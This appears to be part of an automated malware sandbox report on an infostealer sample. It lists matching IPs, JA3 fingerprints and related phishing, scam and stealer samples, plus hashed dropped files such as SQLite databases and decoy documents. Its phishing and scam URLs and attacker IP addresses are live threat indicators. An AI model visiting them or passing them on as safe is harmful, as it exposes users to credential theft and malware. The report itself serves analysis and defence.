	https://sigtn.com////utils/emt.cfm?client_id=9195153&campaign_id=73466&link=tracker.club-os.com////campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=neoparts%E3%80%82com.br/dayo/e6d2/c3RlZmFuQHJlbmNvcmUuY29t$	Get hash	malicious	Unknown	Browse	20.93.211.47
	https://app.frame.io/presentations/da0e116a-d15f-430f-8c37-0aa7d783720f?component_clicked=digest_call_to_action&email_id=8abc710c-c18f-47f5-a884-e927cb8dcfaa&email_type=pending-reviewer-invite	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
NADYMSS-ASRU	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://rapnews.pl	Get hash	malicious	Unknown	Browse	169.150.236.97 173.222.162.32
	http://rfpteams.ksplastlc.net	Get hash	malicious	Unknown	Browse	169.150.236.97 173.222.162.32
	https://app.milanote.com/1RZbnl1zfBXuaf?p=r2B66sphbV4	Get hash	malicious	Unknown	Browse	169.150.236.97 173.222.162.32
	http://decktop.us/gORiyf	Get hash	malicious	HTMLPhisher	Browse	169.150.236.97 173.222.162.32
	https://cos-aliyun8789.towqzg.cn/	Get hash	malicious	Unknown	Browse	169.150.236.97 173.222.162.32
	https://shining-melodic-magnesium.glitch.me/rvicendDev.html	Get hash	malicious	Unknown	Browse	169.150.236.97 173.222.162.32
	http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html	Get hash	malicious	HTMLPhisher	Browse	169.150.236.97 173.222.162.32
	https://c26ruwywyksyku.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-693-8046	Get hash	malicious	TechSupportScam	Browse	169.150.236.97 173.222.162.32
	https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.com	Get hash	malicious	TechSupportScam	Browse	169.150.236.97 173.222.162.32
	https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238	Get hash	malicious	Phisher	Browse	169.150.236.97 173.222.162.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\AFCFHJJECAEHJJKEHIDBKEHJKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\EGIDAAFIEHIEHJKFHCAE

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIIDBKJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDDHMPCDUJ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\ProgramData\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KEBGHCBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBGHCBAEGDHIDGCBAECGIECGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDHCAFCGDAAKEBFIJDG

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_g77dRQ1Csm.exe_c27590204cdb8caa148f294268888955467f75_ea797714_03cc3712-f0d0-42c7-ba65-ac1003aef5a6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0828400367048245
Encrypted:	false
SSDEEP:	192:LRXVfIn00r50jxJGxugCzuiFkZ24IO8Xh:VVfI00r50jYCzuiFkY4IO8Xh
MD5:	72E5E7DC201C9D10D9C9CB41F905FC2D
SHA1:	BE1034A3D21AF4D64674F1E1C5D35754AB5524E5
SHA-256:	BF83BC6E823A088974946F14A791BFF440C914EC05238C76AB1AD27A90BDB8CD
SHA-512:	E2C1904E07BBBC4B549B3B2DEF4D496C1BDB23D82869152C6BD0E7A762F8FC92CF8A51E9B3E7ED7D321F1D6D2D5A84CDC636AC46A4EEBBD982F5E3DF5943705C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.2.2.4.8.6.5.1.8.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.2.2.4.9.4.0.1.8.5.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.c.c.3.7.1.2.-.f.0.d.0.-.4.2.c.7.-.b.a.6.5.-.a.c.1.0.0.3.a.e.f.5.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.7.b.8.4.b.f.-.2.e.f.e.-.4.0.5.5.-.8.6.8.b.-.e.1.a.e.9.8.f.8.a.6.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.7.7.d.R.Q.1.C.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.a.8.-.0.0.0.1.-.0.0.1.4.-.3.e.d.5.-.b.0.b.a.d.e.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.7.f.9.e.5.7.a.f.7.4.c.2.7.3.4.a.9.d.6.9.1.5.3.c.6.8.c.4.8.5.0.0.0.0.f.f.f.f.!.0.0.0.0.f.a.4.8.e.5.a.8.6.b.5.f.2.b.0.4.b.7.9.f.6.c.3.4.5.9.3.3.9.a.1.6.c.2.d.b.6.a.a.a.!.g.7.7.d.R.Q.1.C.s.m...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u42w.0.exe_9ca665a2aca7b1713185c9d969304ec8326e3781_956f251b_e6c17e3e-f7b4-4b07-8b9e-dd4e3ae25acd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1508686671330186
Encrypted:	false
SSDEEP:	192:n06d7C72tRP0nK/wxTjxpZrP2H9HmzuiF4+Z24IO8Yd:06dG72tR8nKYFj9aGzuiF4+Y4IO8Y
MD5:	A903957C9F82BB4A35625EDCB5E00C64
SHA1:	DA5C128E796489DBFA642743FF86C8A55404CFD7
SHA-256:	3D2E054857A0014A511B9AD478107A5C4808CC9106AF12EBD56C9DA55F2AAFCA
SHA-512:	23B5E1ECE46B1A06FB0C99E3839A05B235BB43DB581709E12DE5E7AAE4B5B0095A88C05B26FA153A11F487C48212C3204D1A3AA959DEB1ACC752661009372949
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.2.2.7.4.7.4.2.5.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.2.2.7.5.6.2.9.6.3.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.c.1.7.e.3.e.-.f.7.b.4.-.4.b.0.7.-.8.b.9.e.-.d.d.4.e.3.a.e.2.5.a.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.f.d.d.6.7.5.-.1.b.5.3.-.4.7.0.c.-.b.1.7.b.-.4.3.3.7.7.9.8.6.e.2.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.4.2.w...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.b.8.-.0.0.0.1.-.0.0.1.4.-.7.6.8.a.-.5.3.b.e.d.e.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.e.0.d.5.9.4.4.2.3.6.9.7.6.d.c.5.f.4.6.d.0.c.9.2.3.1.9.f.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.3.2.a.f.7.3.b.d.4.a.f.b.b.1.e.b.7.b.1.2.0.2.6.0.8.2.e.6.0.d.b.e.3.3.6.6.7.9.3.c.!.u.4.2.w...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94E4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Apr 25 07:04:09 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46280
Entropy (8bit):	2.7280001935845615
Encrypted:	false
SSDEEP:	384:+PlObRh14FDYqkYbYSJc18bKpFITyU7zTr07:jbf6DYqkYbYSJc1vc1k7
